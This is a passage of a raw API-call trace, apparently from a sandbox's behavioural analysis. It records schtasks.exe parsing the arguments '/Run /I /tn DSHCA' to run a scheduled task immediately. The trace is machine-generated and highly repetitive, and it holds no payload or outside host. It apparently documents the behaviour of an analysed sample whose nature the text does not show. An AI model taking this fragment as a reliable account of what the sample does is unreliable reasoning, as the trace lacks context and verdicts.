_Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|change|") returned 8 [0297.127] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|Run|") returned 5 [0297.127] lstrlenW (lpString="|change|") returned 8 [0297.127] lstrlenW (lpString="|Run|") returned 5 [0297.127] StrStrIW (lpFirst="|change|", lpSrch="|Run|") returned 0x0 [0297.127] RtlRestoreLastWin32Error () returned 0x490 [0297.127] lstrlenW (lpString="run") returned 3 [0297.127] lstrlenW (lpString="run") returned 3 [0297.127] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.127] lstrlenW (lpString="Run") returned 3 [0297.127] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.127] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|run|") returned 5 [0297.127] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|Run|") returned 5 [0297.127] lstrlenW (lpString="|run|") returned 5 [0297.127] lstrlenW (lpString="|Run|") returned 5 [0297.127] StrStrIW (lpFirst="|run|", lpSrch="|Run|") returned="|run|" [0297.127] RtlRestoreLastWin32Error () returned 0x0 [0297.127] RtlRestoreLastWin32Error () returned 0x0 [0297.128] RtlRestoreLastWin32Error () returned 0x0 [0297.128] lstrlenW (lpString="/I") returned 2 [0297.128] lstrlenW (lpString="-/") returned 2 [0297.128] StrChrIW (lpStart="-/", wMatch=0x5c002f) returned="/" [0297.128] lstrlenW (lpString="?") returned 1 [0297.128] lstrlenW (lpString="?") returned 1 [0297.128] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] lstrlenW (lpString="I") returned 1 [0297.128] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|?|") returned 3 [0297.128] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.128] lstrlenW (lpString="|?|") returned 3 [0297.128] lstrlenW (lpString="|I|") returned 3 [0297.128] StrStrIW (lpFirst="|?|", lpSrch="|I|") returned 0x0 [0297.128] RtlRestoreLastWin32Error () returned 0x490 [0297.128] lstrlenW (lpString="create") returned 6 [0297.128] lstrlenW (lpString="create") returned 6 [0297.128] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] lstrlenW (lpString="I") returned 1 [0297.128] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|create|") returned 8 [0297.128] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.128] lstrlenW (lpString="|create|") returned 8 [0297.128] lstrlenW (lpString="|I|") returned 3 [0297.128] StrStrIW (lpFirst="|create|", lpSrch="|I|") returned 0x0 [0297.128] RtlRestoreLastWin32Error () returned 0x490 [0297.128] lstrlenW (lpString="delete") returned 6 [0297.128] lstrlenW (lpString="delete") returned 6 [0297.128] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] lstrlenW (lpString="I") returned 1 [0297.128] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|delete|") returned 8 [0297.128] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.128] lstrlenW (lpString="|delete|") returned 8 [0297.128] lstrlenW (lpString="|I|") returned 3 [0297.128] StrStrIW (lpFirst="|delete|", lpSrch="|I|") returned 0x0 [0297.128] RtlRestoreLastWin32Error () returned 0x490 [0297.128] lstrlenW (lpString="query") returned 5 [0297.128] lstrlenW (lpString="query") returned 5 [0297.128] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] lstrlenW (lpString="I") returned 1 [0297.128] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.128] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x8, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|query|") returned 7 [0297.128] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.128] lstrlenW (lpString="|query|") returned 7 [0297.128] lstrlenW (lpString="|I|") returned 3 [0297.128] StrStrIW (lpFirst="|query|", lpSrch="|I|") returned 0x0 [0297.129] RtlRestoreLastWin32Error () returned 0x490 [0297.129] lstrlenW (lpString="change") returned 6 [0297.129] lstrlenW (lpString="change") returned 6 [0297.129] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.129] lstrlenW (lpString="I") returned 1 [0297.129] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.129] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|change|") returned 8 [0297.129] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.129] lstrlenW (lpString="|change|") returned 8 [0297.129] lstrlenW (lpString="|I|") returned 3 [0297.129] StrStrIW (lpFirst="|change|", lpSrch="|I|") returned 0x0 [0297.129] RtlRestoreLastWin32Error () returned 0x490 [0297.129] lstrlenW (lpString="run") returned 3 [0297.129] lstrlenW (lpString="run") returned 3 [0297.129] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.129] lstrlenW (lpString="I") returned 1 [0297.129] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.129] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|run|") returned 5 [0297.129] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.129] lstrlenW (lpString="|run|") returned 5 [0297.129] lstrlenW (lpString="|I|") returned 3 [0297.129] StrStrIW (lpFirst="|run|", lpSrch="|I|") returned 0x0 [0297.129] RtlRestoreLastWin32Error () returned 0x490 [0297.129] lstrlenW (lpString="end") returned 3 [0297.130] lstrlenW (lpString="end") returned 3 [0297.131] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.131] lstrlenW (lpString="I") returned 1 [0297.131] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.131] _vsnwprintf (in: _Buffer=0x309188, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|end|") returned 5 [0297.131] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.131] lstrlenW (lpString="|end|") returned 5 [0297.131] lstrlenW (lpString="|I|") returned 3 [0297.131] StrStrIW (lpFirst="|end|", lpSrch="|I|") returned 0x0 [0297.131] RtlRestoreLastWin32Error () returned 0x490 [0297.131] lstrlenW (lpString="showsid") returned 7 [0297.131] lstrlenW (lpString="showsid") returned 7 [0297.131] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.131] lstrlenW (lpString="I") returned 1 [0297.131] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.131] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0xa, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|showsid|") returned 9 [0297.131] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|I|") returned 3 [0297.131] lstrlenW (lpString="|showsid|") returned 9 [0297.131] lstrlenW (lpString="|I|") returned 3 [0297.131] StrStrIW (lpFirst="|showsid|", lpSrch="|I|") returned 0x0 [0297.131] RtlRestoreLastWin32Error () returned 0x490 [0297.131] RtlRestoreLastWin32Error () returned 0x490 [0297.131] RtlRestoreLastWin32Error () returned 0x0 [0297.131] lstrlenW (lpString="/I") returned 2 [0297.131] StrChrIW (lpStart="/I", wMatch=0x3a) returned 0x0 [0297.131] RtlRestoreLastWin32Error () returned 0x490 [0297.131] RtlRestoreLastWin32Error () returned 0x0 [0297.131] lstrlenW (lpString="/I") returned 2 [0297.131] RtlRestoreLastWin32Error () returned 0x0 [0297.131] RtlRestoreLastWin32Error () returned 0x0 [0297.131] lstrlenW (lpString="/tn") returned 3 [0297.131] lstrlenW (lpString="-/") returned 2 [0297.131] StrChrIW (lpStart="-/", wMatch=0x5c002f) returned="/" [0297.131] lstrlenW (lpString="?") returned 1 [0297.131] lstrlenW (lpString="?") returned 1 [0297.131] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.131] lstrlenW (lpString="tn") returned 2 [0297.131] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.131] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|?|") returned 3 [0297.131] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.131] lstrlenW (lpString="|?|") returned 3 [0297.131] lstrlenW (lpString="|tn|") returned 4 [0297.132] RtlRestoreLastWin32Error () returned 0x490 [0297.132] lstrlenW (lpString="create") returned 6 [0297.132] lstrlenW (lpString="create") returned 6 [0297.132] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.132] lstrlenW (lpString="tn") returned 2 [0297.132] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.132] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|create|") returned 8 [0297.132] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.132] lstrlenW (lpString="|create|") returned 8 [0297.132] lstrlenW (lpString="|tn|") returned 4 [0297.132] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0297.132] RtlRestoreLastWin32Error () returned 0x490 [0297.132] lstrlenW (lpString="delete") returned 6 [0297.132] lstrlenW (lpString="delete") returned 6 [0297.132] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.132] lstrlenW (lpString="tn") returned 2 [0297.132] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.132] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|delete|") returned 8 [0297.132] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.132] lstrlenW (lpString="|delete|") returned 8 [0297.132] lstrlenW (lpString="|tn|") returned 4 [0297.132] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0297.132] RtlRestoreLastWin32Error () returned 0x490 [0297.132] lstrlenW (lpString="query") returned 5 [0297.132] lstrlenW (lpString="query") returned 5 [0297.132] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.132] lstrlenW (lpString="tn") returned 2 [0297.132] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.132] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x8, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|query|") returned 7 [0297.132] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.132] lstrlenW (lpString="|query|") returned 7 [0297.132] lstrlenW (lpString="|tn|") returned 4 [0297.132] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0297.132] RtlRestoreLastWin32Error () returned 0x490 [0297.132] lstrlenW (lpString="change") returned 6 [0297.132] lstrlenW (lpString="change") returned 6 [0297.133] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] lstrlenW (lpString="tn") returned 2 [0297.133] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x9, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|change|") returned 8 [0297.133] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.133] lstrlenW (lpString="|change|") returned 8 [0297.133] lstrlenW (lpString="|tn|") returned 4 [0297.133] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0297.133] RtlRestoreLastWin32Error () returned 0x490 [0297.133] lstrlenW (lpString="run") returned 3 [0297.133] lstrlenW (lpString="run") returned 3 [0297.133] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] lstrlenW (lpString="tn") returned 2 [0297.133] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|run|") returned 5 [0297.133] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.133] lstrlenW (lpString="|run|") returned 5 [0297.133] lstrlenW (lpString="|tn|") returned 4 [0297.133] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0297.133] RtlRestoreLastWin32Error () returned 0x490 [0297.133] lstrlenW (lpString="end") returned 3 [0297.133] lstrlenW (lpString="end") returned 3 [0297.133] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] lstrlenW (lpString="tn") returned 2 [0297.133] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|end|") returned 5 [0297.133] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.133] lstrlenW (lpString="|end|") returned 5 [0297.133] lstrlenW (lpString="|tn|") returned 4 [0297.133] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0297.133] RtlRestoreLastWin32Error () returned 0x490 [0297.133] lstrlenW (lpString="showsid") returned 7 [0297.133] lstrlenW (lpString="showsid") returned 7 [0297.133] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] lstrlenW (lpString="tn") returned 2 [0297.133] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.133] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0xa, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|showsid|") returned 9 [0297.133] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x5, _Format="|%s|", _ArgList=0x10f420 | out: _Buffer="|tn|") returned 4 [0297.133] lstrlenW (lpString="|showsid|") returned 9 [0297.133] lstrlenW (lpString="|tn|") returned 4 [0297.133] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0297.133] RtlRestoreLastWin32Error () returned 0x490 [0297.133] RtlRestoreLastWin32Error () returned 0x490 [0297.133] RtlRestoreLastWin32Error () returned 0x0 [0297.133] lstrlenW (lpString="/tn") returned 3 [0297.133] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0297.133] RtlRestoreLastWin32Error () returned 0x490 [0297.133] RtlRestoreLastWin32Error () returned 0x0 [0297.134] lstrlenW (lpString="/tn") returned 3 [0297.134] RtlRestoreLastWin32Error () returned 0x0 [0297.134] RtlRestoreLastWin32Error () returned 0x0 [0297.134] lstrlenW (lpString="DSHCA") returned 5 [0297.134] lstrlenW (lpString="-/") returned 2 [0297.134] StrChrIW (lpStart="-/", wMatch=0x5c0044) returned 0x0 [0297.134] RtlRestoreLastWin32Error () returned 0x490 [0297.134] RtlRestoreLastWin32Error () returned 0x490 [0297.134] RtlRestoreLastWin32Error () returned 0x0 [0297.134] lstrlenW (lpString="DSHCA") returned 5 [0297.134] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0297.134] RtlRestoreLastWin32Error () returned 0x490 [0297.134] RtlRestoreLastWin32Error () returned 0x0 [0297.134] lstrlenW (lpString="DSHCA") returned 5 [0297.134] RtlRestoreLastWin32Error () returned 0x0 [0297.135] RtlRestoreLastWin32Error () returned 0x0 [0297.135] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0297.135] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0297.135] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0297.135] RtlVerifyVersionInfo (VersionInfo=0x10f1d0, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0297.135] RtlRestoreLastWin32Error () returned 0x0 [0297.135] lstrlenW (lpString="run") returned 3 [0297.135] StrChrIW (lpStart="run", wMatch=0x7c) returned 0x0 [0297.135] RtlRestoreLastWin32Error () returned 0x490 [0297.135] RtlRestoreLastWin32Error () returned 0x0 [0297.135] lstrlenW (lpString="run") returned 3 [0297.135] _memicmp (_Buf1=0x3074c8, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.135] RtlRestoreLastWin32Error () returned 0x0 [0297.135] _memicmp (_Buf1=0x307348, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.135] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3094a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0297.135] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x10f2dc | out: lpdwHandle=0x10f2dc) returned 0x76c [0297.135] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x309db0 | out: lpData=0x309db0) returned 1 [0297.135] VerQueryValueW (in: pBlock=0x309db0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10f2e4, puLen=0x10f2e8 | out: lplpBuffer=0x10f2e4*=0x30a160, puLen=0x10f2e8) returned 1 [0297.135] _memicmp (_Buf1=0x307348, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.135] _vsnwprintf (in: _Buffer=0x3094a8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x10f2c8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0297.135] VerQueryValueW (in: pBlock=0x309db0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x10f2f4, puLen=0x10f2f0 | out: lplpBuffer=0x10f2f4*=0x309f88, puLen=0x10f2f0) returned 1 [0297.135] lstrlenW (lpString="schtasks.exe") returned 12 [0297.135] lstrlenW (lpString="schtasks.exe") returned 12 [0297.135] lstrlenW (lpString=".EXE") returned 4 [0297.135] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0297.135] lstrlenW (lpString="schtasks.exe") returned 12 [0297.135] lstrlenW (lpString=".EXE") returned 4 [0297.135] lstrlenW (lpString="schtasks") returned 8 [0297.135] lstrlenW (lpString="/run") returned 4 [0297.136] _memicmp (_Buf1=0x307348, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.136] _vsnwprintf (in: _Buffer=0x3094a8, _BufferCount=0x16, _Format="%s %s", _ArgList=0x10f2c8 | out: _Buffer="schtasks /run") returned 13 [0297.136] _memicmp (_Buf1=0x307360, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.136] _memicmp (_Buf1=0x307378, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.136] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x30a660, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0297.136] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0297.136] _vsnwprintf (in: _Buffer=0x3069e8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x10f2cc | out: _Buffer="Type \"SCHTASKS /RUN /?\" for usage.") returned 34 [0297.136] RtlRestoreLastWin32Error () returned 0x0 [0297.136] GetThreadLocale () returned 0x409 [0297.136] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.136] lstrlenW (lpString="run") returned 3 [0297.136] GetThreadLocale () returned 0x409 [0297.136] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.136] lstrlenW (lpString="?") returned 1 [0297.136] GetThreadLocale () returned 0x409 [0297.136] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.136] lstrlenW (lpString="s") returned 1 [0297.136] GetThreadLocale () returned 0x409 [0297.136] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.136] lstrlenW (lpString="u") returned 1 [0297.136] GetThreadLocale () returned 0x409 [0297.136] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.136] lstrlenW (lpString="p") returned 1 [0297.136] GetThreadLocale () returned 0x409 [0297.136] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.137] lstrlenW (lpString="i") returned 1 [0297.137] GetThreadLocale () returned 0x409 [0297.137] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.137] lstrlenW (lpString="tn") returned 2 [0297.137] GetThreadLocale () returned 0x409 [0297.137] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0297.137] lstrlenW (lpString="hresult") returned 7 [0297.137] RtlRestoreLastWin32Error () returned 0x0 [0297.137] RtlRestoreLastWin32Error () returned 0x0 [0297.137] lstrlenW (lpString="/Run") returned 4 [0297.137] lstrlenW (lpString="-/") returned 2 [0297.137] StrChrIW (lpStart="-/", wMatch=0x5c002f) returned="/" [0297.137] lstrlenW (lpString="run") returned 3 [0297.137] lstrlenW (lpString="run") returned 3 [0297.137] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.137] lstrlenW (lpString="Run") returned 3 [0297.137] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.137] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|run|") returned 5 [0297.137] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|Run|") returned 5 [0297.137] lstrlenW (lpString="|run|") returned 5 [0297.137] lstrlenW (lpString="|Run|") returned 5 [0297.137] StrStrIW (lpFirst="|run|", lpSrch="|Run|") returned="|run|" [0297.137] RtlRestoreLastWin32Error () returned 0x0 [0297.137] RtlRestoreLastWin32Error () returned 0x0 [0297.137] RtlRestoreLastWin32Error () returned 0x0 [0297.137] lstrlenW (lpString="/I") returned 2 [0297.137] lstrlenW (lpString="-/") returned 2 [0297.137] StrChrIW (lpStart="-/", wMatch=0x5c002f) returned="/" [0297.137] lstrlenW (lpString="run") returned 3 [0297.137] lstrlenW (lpString="run") returned 3 [0297.137] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.137] lstrlenW (lpString="I") returned 1 [0297.137] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.137] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x6, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|run|") returned 5 [0297.137] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|I|") returned 3 [0297.137] lstrlenW (lpString="|run|") returned 5 [0297.137] lstrlenW (lpString="|I|") returned 3 [0297.137] StrStrIW (lpFirst="|run|", lpSrch="|I|") returned 0x0 [0297.137] RtlRestoreLastWin32Error () returned 0x490 [0297.137] lstrlenW (lpString="?") returned 1 [0297.137] lstrlenW (lpString="?") returned 1 [0297.137] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] lstrlenW (lpString="I") returned 1 [0297.138] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|?|") returned 3 [0297.138] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|I|") returned 3 [0297.138] lstrlenW (lpString="|?|") returned 3 [0297.138] lstrlenW (lpString="|I|") returned 3 [0297.138] StrStrIW (lpFirst="|?|", lpSrch="|I|") returned 0x0 [0297.138] RtlRestoreLastWin32Error () returned 0x490 [0297.138] lstrlenW (lpString="s") returned 1 [0297.138] lstrlenW (lpString="s") returned 1 [0297.138] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] lstrlenW (lpString="I") returned 1 [0297.138] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|s|") returned 3 [0297.138] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|I|") returned 3 [0297.138] lstrlenW (lpString="|s|") returned 3 [0297.138] lstrlenW (lpString="|I|") returned 3 [0297.138] StrStrIW (lpFirst="|s|", lpSrch="|I|") returned 0x0 [0297.138] RtlRestoreLastWin32Error () returned 0x490 [0297.138] lstrlenW (lpString="u") returned 1 [0297.138] lstrlenW (lpString="u") returned 1 [0297.138] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] lstrlenW (lpString="I") returned 1 [0297.138] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|u|") returned 3 [0297.138] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|I|") returned 3 [0297.138] lstrlenW (lpString="|u|") returned 3 [0297.138] lstrlenW (lpString="|I|") returned 3 [0297.138] StrStrIW (lpFirst="|u|", lpSrch="|I|") returned 0x0 [0297.138] RtlRestoreLastWin32Error () returned 0x490 [0297.138] lstrlenW (lpString="p") returned 1 [0297.138] lstrlenW (lpString="p") returned 1 [0297.138] _memicmp (_Buf1=0x307450, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] lstrlenW (lpString="I") returned 1 [0297.138] _memicmp (_Buf1=0x307390, _Buf2=0x1082708, _Size=0x7) returned 0 [0297.138] _vsnwprintf (in: _Buffer=0x309168, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|p|") returned 3 [0297.138] _vsnwprintf (in: _Buffer=0x307480, _BufferCount=0x4, _Format="|%s|", _ArgList=0x10f2b8 | out: _Buffer="|I|") returned 3 [0297.139] lstrlenW (lpString="|p|") returned 3 [0297.139] lstrlenW (lpString="|I|") returned 3 [0297.139] StrStrIW (lpFirst="|p|", lpSrch="|I|") returned 0x0 [0297.139] RtlRestoreLastWin32Error () returned 0x490 [0297.139] lstrlenW (lpString="i") returned 1 [0297.139] lstrlenW (lpString="i") returned 1 